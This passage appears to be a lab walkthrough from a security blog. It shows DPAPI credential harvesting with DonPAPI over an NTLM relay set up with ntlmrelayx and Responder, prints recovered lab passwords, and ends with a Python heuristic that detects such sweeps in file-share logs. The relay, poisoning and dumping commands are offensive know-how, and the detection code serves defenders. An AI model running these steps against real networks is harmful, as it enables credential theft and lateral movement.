DonPapi
My third favorite tool for retrieving Windows secrets from Linux is DonPAPI. It collects DPAPI-protected secrets and other stored credentials (files, browsers, scheduled tasks, ...). The tool does not touch LSASS, so it is stealthier and works most of the time even when AV and EDR are enabled on the target.
Installation
git clone https://github.com/login-securite/DonPAPI.git
cd DonPAPI
python3 -m pip install -r requirements.txt
python3 DonPAPI.py
Run ntlmrelayx.py and wait for a connection from fernando.alonzo
sudo ntlmrelayx.py -socks -smb2support -tf unsigned_smb.txt

Run Responder
sudo responder -I enp0s3
Run DonPAPI
sudo proxychains python3 DonPAPI.py -no-pass 'NORTH'/'fernando.alonzo'@'192.168.56.22'
DonPAPI gives us the stored password of the SQL service account: sql_svc:YouWillNotKerboroast1ngMeeeeee
We also get the password of fernando.alonzo, IDr1R3allyF@sTF1!, because a scheduled task was set up on this computer with that account.
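Because the tool avoids LSASS and instead reads DPAPI master keys and credential blobs out of user profiles over SMB, the defender's counterpart is to watch file-share access for exactly that pattern. The following is an added example, not code from this post or from the DonPAPI project: a Python heuristic over constructed, one-line renderings of Windows Security event 5145 (detailed file share access) that flags a single source reading DPAPI paths from several user profiles within a short window. The log line format, IP addresses, account names and SIDs are assumptions made up for the example.

```python
"""Heuristic detection of remote DPAPI secret collection over SMB.

Added example, not part of the original post and not DonPAPI's own code.
Assumption: a Windows host forwards Security event ID 5145 (detailed file
share access) as one line per event carrying the share, the relative target
path, the source address and the account. Collecting DPAPI material remotely
means reading master keys (AppData\\...\\Microsoft\\Protect) and credential
blobs (AppData\\...\\Microsoft\\Credentials) from many profiles through C$
from one source in a short time, which is what this heuristic scores.
The sample log below is constructed for the example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Profile-relative locations of DPAPI master keys and credential blobs.
DPAPI_PATHS = re.compile(
    r"\\Users\\(?P<user>[^\\]+)\\AppData\\(?:Roaming|Local)\\Microsoft\\"
    r"(?:Protect|Credentials)\\",
    re.IGNORECASE,
)

# Assumed one-line rendering of event 5145 (constructed format).
LINE = re.compile(
    r"^(?P<ts>\S+ \S+) 5145 share=(?P<share>\S+) path=(?P<path>\S+) "
    r"src=(?P<src>\S+) account=(?P<account>\S+)$"
)

# Constructed sample: one source sweeps three profiles in seconds, a user
# touches their own profile, and an unrelated file read is mixed in.
SAMPLE_LOG = r"""
2024-05-01 10:00:01 5145 share=\\*\C$ path=\Users\alice\AppData\Roaming\Microsoft\Protect\S-1-5-21-0-0-0-1001\keyfile src=192.168.56.1 account=NORTH\fernando.alonzo
2024-05-01 10:00:02 5145 share=\\*\C$ path=\Users\alice\AppData\Roaming\Microsoft\Credentials\blob1 src=192.168.56.1 account=NORTH\fernando.alonzo
2024-05-01 10:00:05 5145 share=\\*\C$ path=\Users\bob\AppData\Roaming\Microsoft\Protect\S-1-5-21-0-0-0-1002\keyfile src=192.168.56.1 account=NORTH\fernando.alonzo
2024-05-01 10:00:09 5145 share=\\*\C$ path=\Users\sql_svc\AppData\Roaming\Microsoft\Protect\S-1-5-21-0-0-0-1003\keyfile src=192.168.56.1 account=NORTH\fernando.alonzo
2024-05-01 10:05:00 5145 share=\\*\C$ path=\Users\bob\AppData\Roaming\Microsoft\Protect\S-1-5-21-0-0-0-1002\keyfile src=192.168.56.40 account=NORTH\bob
2024-05-01 10:06:00 5145 share=\\*\C$ path=\Windows\System32\drivers\etc\hosts src=192.168.56.1 account=NORTH\fernando.alonzo
"""


def parse_events(text):
    """Parse the assumed one-line event format; lines that do not match are skipped."""
    events = []
    for raw in text.splitlines():
        raw = raw.strip()
        m = LINE.match(raw) if raw else None
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
            "share": m["share"],
            "path": m["path"],
            "src": m["src"],
            "account": m["account"],
        })
    return events


def detect_dpapi_harvesting(text, min_profiles=3, window=timedelta(minutes=10)):
    """Return one alert per (src, account) that reads DPAPI material from at
    least `min_profiles` distinct user profiles inside any `window`."""
    touches = defaultdict(list)  # (src, account) -> [(ts, profile, path)]
    for ev in parse_events(text):
        m = DPAPI_PATHS.search(ev["path"])
        if m:
            touches[(ev["src"], ev["account"])].append((ev["ts"], m["user"].lower(), ev["path"]))

    alerts = []
    for (src, account), items in touches.items():
        items.sort()
        # Slide a window over the time-ordered accesses from this source.
        for i, (start, _, _) in enumerate(items):
            in_window = [it for it in items[i:] if it[0] - start <= window]
            profiles = sorted({it[1] for it in in_window})
            if len(profiles) >= min_profiles:
                alerts.append({
                    "src": src,
                    "account": account,
                    "profiles": profiles,
                    "first_seen": start.isoformat(),
                    "events": len(in_window),
                })
                break  # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_dpapi_harvesting(SAMPLE_LOG):
        print(f"ALERT: {alert['account']} from {alert['src']} read DPAPI material "
              f"of {len(alert['profiles'])} profiles {alert['profiles']} "
              f"starting {alert['first_seen']} ({alert['events']} events)")
```

On the constructed sample this raises one alert for 192.168.56.1, which touched the Protect or Credentials directories of three profiles within eight seconds, while bob reading his own profile and the unrelated hosts file read are ignored. The threshold is the tuning knob: a single profile is normal for a user at their own desk, several profiles from one source in minutes is a sweep.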